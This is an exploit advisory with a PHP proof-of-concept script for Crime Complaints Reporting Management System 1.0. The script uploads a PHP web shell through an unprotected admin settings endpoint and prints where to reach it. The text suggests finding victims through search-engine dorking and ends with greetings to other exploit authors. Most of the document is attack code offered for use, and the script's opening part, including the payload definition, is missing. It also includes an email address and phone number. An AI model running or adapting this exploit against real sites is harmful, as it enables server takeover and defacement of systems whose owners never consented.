============================================================================================================================================= | # Title : Crime Complaints Reporting Management System 1.0 code injection Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits) | | # Vendor : https://www.sourcecodester.com/sites/default/files/download/oretnom23/complaints-report-management-system.zip | ============================================================================================================================================= poc : [+] Dorking İn Google Or Other Search Enggine. [+] This payload injects php code of your choice into an SHELL.php file. [+] save payload as poc.php [+] usage from cmd : C:\www\test>php 1.php target.com [+] payload : "; $post_fields = array( 'action' => '', 'name' => 'Hacked By Indoushka', 'email' => 'indoushka4ever@gmail.com', 'contact' => '00213771818860', 'img' => new CURLFile('data://text/plain;base64,' . base64_encode($webshell_payload), 'application/x-php', $file_name), 'about' => 'Hacked By Indoushka', 'qty' => '1' ); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "$website/admin/ajax.php?action=save_settings"); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $response = curl_exec($ch); curl_close($ch); echo "(+) Shell uploaded successfully.\n"; echo "(+) Access the shell at: $website/admin/assets/uploads/\n"; } if ($argc != 2) { echo "(+) Usage: php " . $argv[0] . " \n"; echo "(+) Example: php " . $argv[0] . " http://example.com\n"; exit(-1); } $website = $argv[1]; file_upload($website); Greetings to :============================================================ jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr | ==========================================================================